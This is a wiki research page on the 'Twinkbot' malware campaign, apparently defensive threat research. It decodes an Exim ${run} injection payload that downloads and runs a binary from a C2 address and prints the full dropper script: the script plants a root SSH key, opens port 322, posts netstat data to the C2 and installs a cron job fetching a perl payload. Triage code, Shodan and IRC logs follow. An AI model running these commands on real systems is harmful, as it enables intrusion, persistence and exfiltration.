Differences between revisions 6 and 7
Revision 6 as of 2020-04-04 07:47:36 (Size: 7756, Editor: Sciuro)
Revision 7 as of 2020-04-04 07:54:02 (Size: 7790, Editor: Sciuro)

Line 45 (added in revision 7):
 * https://pastebin.com/kXFkemhf

Origin

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>

Replace \x with % (and \t with a space):

%2Fbin%2Fsh -c %22wget%2045.148.10.84%2fss%20-Osxs%3bchmod%20%2bx%20sxs%3b.%2fsxs%22

URL decode:

/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"
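As an added example (not part of the original page), the Python below does the decoding above mechanically: it pulls the ${run{...}} body out of the captured address, decodes the \xHH and \t escapes both directly and via the \x-to-% route used above, then splits the result into its ';'-separated stages and lists the download target. The only input is the address string captured on this page; the function names are my own.

```python
import re
from urllib.parse import unquote

# Added example (not from the original page): decode the obfuscated ${run{...}}
# payload observed in the recipient address above. The address string is the one
# captured on this page; function names and the stage splitting are my own.
CAPTURED_ADDRESS = (
    r"<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs"
    r"\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>"
)

RUN_RE = re.compile(r"\$\{run\{(.*)\}\}")        # greedy: the payload itself has no braces
ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\t")  # \xHH hex escapes and \t separators


def extract_run_payload(address):
    """Return the raw (still escaped) body of the ${run{...}} expansion."""
    m = RUN_RE.search(address)
    if not m:
        raise ValueError("no ${run{...}} expansion in address")
    return m.group(1)


def decode_escapes(payload):
    """Decode \\xHH to the byte it names and \\t to a space, as done by hand above."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return " "
    return ESC_RE.sub(repl, payload)


def decode_via_percent(payload):
    """The page's two-step route: rewrite \\x as %, then URL-decode."""
    percent_form = payload.replace("\\t", " ").replace("\\x", "%")
    return unquote(percent_form)


def split_stages(command):
    """Split the quoted 'sh -c "..."' body into its ';'-separated stages for triage."""
    inner = re.search(r'"(.*)"', command)
    body = inner.group(1) if inner else command
    return [s.strip() for s in body.split(";") if s.strip()]


def extract_urls(command):
    """Pull the download targets (first non-option argument of wget/curl) out of the command."""
    return re.findall(r"(?:wget|curl)\s+(?:-\S+\s+)*(\S+)", command)


if __name__ == "__main__":
    raw = extract_run_payload(CAPTURED_ADDRESS)
    cmd = decode_escapes(raw)
    print(cmd)                                   # same string as the hand decode above
    assert cmd == decode_via_percent(raw)        # both routes agree
    for i, stage in enumerate(split_stages(cmd), 1):
        print(f"stage {i}: {stage}")
    print("download targets:", extract_urls(cmd))
```

The direct decoder is the one to keep for bulk use: the percent route only works while the escapes happen to line up with URL encoding, whereas the \xHH regex decodes any byte the sender chose.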

    #!/bin/bash
    exists=$(grep -c "^jkl:" /etc/passwd)
    if [ $exists -eq 0 ]; then
    chattr -isa /root/.ssh/authorized_keys
    echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
    /usr/sbin/sshd -p 322
    /sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /sbin/iptables-save >/dev/null 2>&1
    /usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
    /usr/sbin/iptables-save >/dev/null 2>&1
    data2=`netstat -natp |grep sshd|base64`
    wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
    cd /tmp
    echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
    echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
    echo '* * * * * /tmp/twink' >mycron
    crontab -l >> mycron
    chmod +x /tmp/twink
    crontab mycron;rm -fr mycron
    else
    exit
    fi
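The script above leaves three durable traces on a host: the root authorized_keys entry it writes, the second sshd it starts on port 322, and the every-minute cron job in /tmp. The following Python is an added triage example, not part of the original page: each check takes captured text (authorized_keys contents, crontab -l output, netstat -natp output) so it can be run offline against a forensic copy. The key blob and the port number come from the script; the sample inputs are constructed, and the assumption that legitimate sshd listens only on 22 is mine.

```python
import re

# Added example, not from the original page: offline triage checks for the
# artefacts the dropper script above leaves behind. Sample inputs are constructed
# except for the key blob and the port, which are copied from the script.

# Public key the script writes to /root/.ssh/authorized_keys (copied from it).
TWINKBOT_KEY = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh1"
    "39jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/K"
    "CvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2l"
    "FmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9"
    "GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ"
)
SSHD_EXPECTED_PORTS = {22}   # assumption: legitimate sshd on this host listens on 22 only
BACKDOOR_SSHD_PORT = 322     # the script runs '/usr/sbin/sshd -p 322'

CRON_RE = re.compile(r"^\s*(\S+\s+){5}(?P<cmd>.+)$")
NETSTAT_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+LISTEN\s+(?P<proc>\S+)")


def check_authorized_keys(text):
    """Flag the dropper's key, and any key whose comment is a bare 'user@' with no host."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        blob, comment = parts[1], (parts[2] if len(parts) > 2 else "")
        if blob == TWINKBOT_KEY:
            findings.append(f"authorized_keys:{n}: key matches the Twinkbot dropper key")
        elif re.fullmatch(r"[^@\s]+@", comment):
            findings.append(f"authorized_keys:{n}: suspicious key comment {comment!r}")
    return findings


def check_crontab(text):
    """Flag cron jobs that execute from a world-writable directory."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        if re.search(r"(^|[\s;|&])/(tmp|var/tmp|dev/shm)/", cmd):
            findings.append(f"crontab:{n}: job runs from world-writable dir: {cmd}")
    return findings


def check_listeners(text):
    """Flag sshd listening on a port outside the expected set (the script adds 322)."""
    findings = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line.strip())
        if not m or "sshd" not in m.group("proc"):
            continue
        port = int(m.group("local").rsplit(":", 1)[1])
        if port not in SSHD_EXPECTED_PORTS:
            tag = " (dropper default)" if port == BACKDOOR_SSHD_PORT else ""
            findings.append(f"netstat: sshd listening on unexpected port {port}{tag}")
    return findings


def triage(authorized_keys_text, crontab_text, netstat_text):
    """Run every check; an empty list means none of the dropper's traces were found."""
    return (check_authorized_keys(authorized_keys_text)
            + check_crontab(crontab_text)
            + check_listeners(netstat_text))


# Constructed samples: a legitimate admin key (placeholder blob) next to the dropper's
# entry, a normal backup job next to the dropper's cron job, sshd on 22 and on 322.
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCplaceholderAdminKey admin@bastion\n"
    f"ssh-rsa {TWINKBOT_KEY} root@\n"
)
SAMPLE_CRONTAB = "0 3 * * * /usr/local/bin/backup.sh\n* * * * * /tmp/twink\n"
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1023/sshd
tcp        0      0 0.0.0.0:322             0.0.0.0:*               LISTEN      2187/sshd
tcp        0      0 10.0.0.5:322            198.51.100.7:51822      ESTABLISHED 2190/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      1301/httpd
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_AUTHORIZED_KEYS, SAMPLE_CRONTAB, SAMPLE_NETSTAT):
        print(finding)
```

Because the script runs `chattr -isa` before overwriting authorized_keys, an immutable flag on that file is not a defence here; the listener and cron checks are the ones that do not depend on the attacker's key staying unchanged.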

IP research

Shodan

    22/tcp ssh - OpenSSH, Version: 5.3

    SSH-2.0-OpenSSH_5.3
    Key type: ssh-rsa
    Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAvyWZgWstpcVr2blRlY/abtcMf0HAHITFE2ZPjZdu9ikzFFtf
    AgJrdqEX1JoLXvXH+KpE9GYw+4H+J5/qVaBOmMUsCCZmZBdSgI5Va5ZXD2CcZD95JvpbB7w7Zr0Z
    8M32GUPZrrnZY29ZSE0ZeMW6CvcXRH2rU+kEy8cHBaXZjPt6Ng3WXJR1JvVjqPeHQneyOtnw/pGZ
    Yxxwyt8xa9ySoKN0dJOCJBKUhjtXmfH0OLHk9eUQUJ0A5r9F8qCW3JEZcPapfNTITF9rA3f57THC
    +JuoTNxJgS883m/ljcWZJEeWi9IluUMb5ZDDSh+/EVlfhGHOUC6PJ6n8NHE/TrXqwQ==
    Fingerprint: 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c

    Kex Algorithms:
        diffie-hellman-group-exchange-sha256
        diffie-hellman-group-exchange-sha1
        diffie-hellman-group14-sha1
        diffie-hellman-group1-sha1

    Server Host Key Algorithms:
        ssh-rsa
        ssh-dss

    Encryption Algorithms:
        aes128-ctr
        aes192-ctr
        aes256-ctr
        arcfour256
        arcfour128
        aes128-cbc
        3des-cbc
        blowfish-cbc
        cast128-cbc
        aes192-cbc
        aes256-cbc
        arcfour
        rijndael-cbc@lysator.liu.se

    MAC Algorithms:
        hmac-md5
        hmac-sha1
        umac-64@openssh.com
        hmac-sha2-256
        hmac-sha2-512
        hmac-ripemd160
        hmac-ripemd160@openssh.com
        hmac-sha1-96
        hmac-md5-96

    Compression Algorithms:
        none
        zlib@openssh.com

    80/tcp http - Apache httpd, Version: 2.2.15

    HTTP/1.1 403 Forbidden
    Date: Sun, 29 Mar 2020 01:37:10 GMT
    Server: Apache/2.2.15 (CentOS)
    Accept-Ranges: bytes
    Content-Length: 4961
    Connection: close
    Content-Type: text/html; charset=UTF-8

    5432/tcp postgresql - PostgreSQL

    PostgreSQL
    received invalid response to SSL negotiation: :

    8080/tcp http - Unreal ircd

    :irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
    :irc.evilcode.php NOTICE AUTH :*** Found your hostname (cached)
    ERROR :Closing Link: [180.25.78.224] (HTTP command from IRC connection (ATTACK?))

    9999/tcp telnet - Unreal ircd

    :irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
    :irc.evilcode.php NOTICE AUTH :*** Found your hostname
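Two ssh-rsa public keys appear in this research: the port-22 host key Shodan recorded above, and the key the dropper script writes into /root/.ssh/authorized_keys. The Python below is an added example, not part of the original page or of any tool it mentions: it parses both keys from the SSH wire format (length-prefixed type, exponent and modulus) and computes the MD5 fingerprint in the colon form Shodan prints, plus the SHA256 form current OpenSSH prints. The key strings are copied from the page; the function names are my own.

```python
import base64
import hashlib
import struct

# Added example, not from the original page: parse the two ssh-rsa public keys seen
# in this research from the SSH wire format and compute their fingerprints.

# Port-22 host key as recorded by Shodan (page reports
# Fingerprint: 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c for it).
SHODAN_HOST_KEY_B64 = (
    "AAAAB3NzaC1yc2EAAAABIwAAAQEAvyWZgWstpcVr2blRlY/abtcMf0HAHITFE2ZPjZdu9ikzFFtf"
    "AgJrdqEX1JoLXvXH+KpE9GYw+4H+J5/qVaBOmMUsCCZmZBdSgI5Va5ZXD2CcZD95JvpbB7w7Zr0Z"
    "8M32GUPZrrnZY29ZSE0ZeMW6CvcXRH2rU+kEy8cHBaXZjPt6Ng3WXJR1JvVjqPeHQneyOtnw/pGZ"
    "Yxxwyt8xa9ySoKN0dJOCJBKUhjtXmfH0OLHk9eUQUJ0A5r9F8qCW3JEZcPapfNTITF9rA3f57THC"
    "+JuoTNxJgS883m/ljcWZJEeWi9IluUMb5ZDDSh+/EVlfhGHOUC6PJ6n8NHE/TrXqwQ=="
)
# Key the dropper script writes to /root/.ssh/authorized_keys (copied from the script).
DROPPER_AUTHORIZED_KEY_B64 = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh1"
    "39jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/K"
    "CvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2l"
    "FmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9"
    "GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ"
)


def read_string(blob, offset):
    """Read one SSH 'string' (uint32 big-endian length, then that many bytes)."""
    if offset + 4 > len(blob):
        raise ValueError("truncated length field")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start, end = offset + 4, offset + 4 + length
    if end > len(blob):
        raise ValueError("truncated string body")
    return blob[start:end], end


def parse_rsa_pubkey(b64):
    """Decode an ssh-rsa key blob into type, exponent, modulus size and fingerprints."""
    blob = base64.b64decode(b64, validate=True)
    key_type, off = read_string(blob, 0)
    if key_type != b"ssh-rsa":
        raise ValueError(f"unsupported key type {key_type!r}")
    e_bytes, off = read_string(blob, off)
    n_bytes, off = read_string(blob, off)
    if off != len(blob):
        raise ValueError("trailing data after modulus")
    n = int.from_bytes(n_bytes, "big")
    md5_hex = hashlib.md5(blob).hexdigest()
    sha256_b64 = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {
        "type": key_type.decode(),
        "e": int.from_bytes(e_bytes, "big"),
        "bits": n.bit_length(),
        "md5_fingerprint": ":".join(md5_hex[i:i + 2] for i in range(0, 32, 2)),
        "sha256_fingerprint": "SHA256:" + sha256_b64,
    }


if __name__ == "__main__":
    for label, b64 in (("shodan port-22 host key", SHODAN_HOST_KEY_B64),
                       ("dropper authorized_keys entry", DROPPER_AUTHORIZED_KEY_B64)):
        info = parse_rsa_pubkey(b64)
        print(f"{label}: {info['type']} {info['bits']}-bit, e={info['e']}")
        print(f"  MD5    {info['md5_fingerprint']}")
        print(f"  SHA256 {info['sha256_fingerprint']}")
```

Running it shows the host key uses the old public exponent 35 while the dropper key uses 65537, and the MD5 line can be checked against the Fingerprint value Shodan reported, which is a quick way to confirm the key was transcribed intact. The SHA256 form is what `ssh-keygen -lf` and known_hosts warnings print, so it is the one to put on a blocklist when hunting for the dropper's key across a fleet.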

Servers

IRCD server

[09:08:24] Connecting to [45.148.10.84] on port 8080
[09:08:24] Connection to host established
[09:08:25] -irc.evilcode.php-   *** Looking up your hostname...
[09:08:25] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:08:25] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:08:25] There are 1 users and 9 invisible on 1 servers
[09:08:25] 1 operator(s) online
[09:08:25] 4 channels formed
[09:08:25] I have 10 clients and 0 servers
[09:08:25] Current local users 10, max 232
[09:08:25] Current global users 10, max 232
[09:08:25] Message(422): MOTD File is missing
[09:08:25] Guest55 sets mode +iwx

Only channel #R

[09:12:07] Guest55 (guest55@2E03481B.742B81C2.C80A0F0D.IP) joined the channel
[09:12:07] Mode is +Mmnstu
[09:12:18] evil has userhost fld@mfu.txt and real name “.”
[09:12:18] evil is in @#R
[09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!)
[09:12:18] evil is a Network Administrator
[09:12:18] evil is available for help.
[09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds

[09:13:49] Connecting to [45.148.10.84] on port 9999
[09:13:49] Connection to host established
[09:13:49] -irc.evilcode.php-   *** Looking up your hostname...
[09:13:49] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:13:49] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:13:49] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:13:49] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:13:49] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:13:49] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:13:49] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:13:49] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:13:49] There are 1 users and 9 invisible on 1 servers
[09:13:49] 1 operator(s) online
[09:13:49] 1 unknown connection(s)
[09:13:49] 4 channels formed
[09:13:49] I have 10 clients and 0 servers
[09:13:49] Current local users 10, max 232
[09:13:49] Current global users 10, max 232
[09:13:49] Message(422): MOTD File is missing
[09:13:49] Guest55 sets mode +iwx
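The two connection logs above are read by eye; the Python below is an added example, not part of the original page, that turns such a client-side log into a structured record (server name, version, ISUPPORT tokens, user and channel counts) and diffs two records, so repeated visits to the same C2 server can be compared mechanically. The sample log is a constructed excerpt of the port-8080 session shown above; the field and function names are my own.

```python
import re

# Added example, not from the original page: parse the client-side log of an IRC
# connection into a record and diff two such records. SAMPLE_LOG is a constructed
# excerpt of the port-8080 session shown above.

SAMPLE_LOG = """\
[09:08:24] Connecting to [45.148.10.84] on port 8080
[09:08:25] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:08:25] There are 1 users and 9 invisible on 1 servers
[09:08:25] 1 operator(s) online
[09:08:25] 4 channels formed
[09:08:25] I have 10 clients and 0 servers
[09:08:25] Current local users 10, max 232
"""

TS_RE = re.compile(r"^\[\d\d:\d\d:\d\d\]\s*")
ISUPPORT_SUFFIX = " are supported by this server"
LINE_PATTERNS = [
    re.compile(r"Connecting to \[(?P<host>[^\]]+)\] on port (?P<port>\d+)"),
    re.compile(r"Welcome to the (?P<welcome_network>.+?) IRC Network (?P<client_mask>\S+)"),
    re.compile(r"Your host is (?P<server>[^,]+), running version (?P<version>\S+)"),
    re.compile(r"This server was created (?P<created>.+)"),
    re.compile(r"There are (?P<users_visible>\d+) users and (?P<users_invisible>\d+) invisible on (?P<servers>\d+) servers"),
    re.compile(r"(?P<operators>\d+) operator\(s\) online"),
    re.compile(r"(?P<channels>\d+) channels formed"),
    re.compile(r"Current local users (?P<local_users>\d+), max (?P<max_users>\d+)"),
]
INT_FIELDS = {"port", "users_visible", "users_invisible", "servers",
              "operators", "channels", "local_users", "max_users"}


def parse_isupport(text):
    """Turn 'KEY=value KEY ...' tokens into a dict; flag-only tokens map to True."""
    tokens = {}
    for tok in text.split():
        key, sep, value = tok.partition("=")
        tokens[key] = value if sep else True
    return tokens


def parse_irc_log(log):
    """Collect server identity, ISUPPORT tokens and counts from a client log."""
    record = {"isupport": {}}
    for raw in log.splitlines():
        line = TS_RE.sub("", raw).strip()
        if line.endswith(ISUPPORT_SUFFIX):
            record["isupport"].update(parse_isupport(line[:-len(ISUPPORT_SUFFIX)]))
            continue
        for pattern in LINE_PATTERNS:
            m = pattern.search(line)
            if m:
                for k, v in m.groupdict().items():
                    record[k] = int(v) if k in INT_FIELDS else v
                break
    return record


def total_users(record):
    """Visible plus invisible users, the population the server admits to."""
    return record["users_visible"] + record["users_invisible"]


def diff_records(a, b):
    """Fields whose value differs between two parsed sessions (ISUPPORT compared whole)."""
    return {k: (a.get(k), b.get(k)) for k in set(a) | set(b) if a.get(k) != b.get(k)}


if __name__ == "__main__":
    first = parse_irc_log(SAMPLE_LOG)
    print(first["server"], first["version"], first["isupport"]["NETWORK"])
    print("users:", total_users(first), "channels:", first["channels"])
    # A later visit with one fewer invisible user (constructed by editing the sample).
    later = parse_irc_log(SAMPLE_LOG.replace("9 invisible", "8 invisible"))
    print("changed:", diff_records(first, later))
```

Keeping these records per visit is what makes the two sessions above comparable at a glance: the record for port 9999 differs from port 8080 only in the timestamps and the extra "1 unknown connection(s)" line, which this parser ignores, so diff_records returns an empty dict for that pair.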

Research/2020/Twinkbot (last edited 2020-04-04 16:23:26 by Sciuro)